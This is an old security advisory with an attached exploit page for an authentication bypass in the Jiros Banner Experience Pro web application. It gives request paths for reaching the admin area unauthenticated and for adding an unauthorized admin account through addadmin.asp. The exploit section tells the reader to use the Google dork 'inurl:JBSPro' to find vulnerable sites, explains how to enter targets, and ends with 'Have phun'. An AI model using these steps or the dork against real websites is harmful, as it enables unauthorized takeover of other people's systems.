--Security Report-- Advisory: Jiros Banner Experience Pro Remote Privilege Escalation. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 07/03/06 04:52 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@nukedx.com Web: http://www.nukedx.com } --- Vendor: Jiros (http://www.jiros.net) Version: 1.0 and prior versions must be affected. About: Via this method remote attacker can by pass security control of system and edit all options. Level: Critical --- How&Example: Security control in admin panel's index did not sanitized properly. GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/ wtih this example remote attack bypasses security control, but s/he will get some errors because ; s/he did not logged in system and doesnt have admin cookies so lets add a new admin account :) GET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp so with this example remote attacker can make admin account succesfully and when he logins via http://[victim]/[JBPSDir]/files/login.asp can take whole system control. --- Timeline: * 07/03/2006: Vulnerability found. * 07/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=19 With this exploit remote attacker can make new admin account. -- begin exploit --- Jiros Banner Experience Pro Unauthorized Admin Add Exploit
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit This exploit has been coded by nukedx You can found original advisory on http://www.nukedx.com/?viewdoc=19 Dork for this exploit: inurl:JBSPro Your target must be like that: www.victim.com/Path/ The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ For second example your target must be www.victim.com/ You can login with your admin account via www.victim.com/JBSPath/files/login.asp Have phun
Target ->
-- end exploit --- Save this code as .htm and then execute. --- Dorks: inurl:JBSPro --- Original advisory: http://www.nukedx.com/?viewdoc=19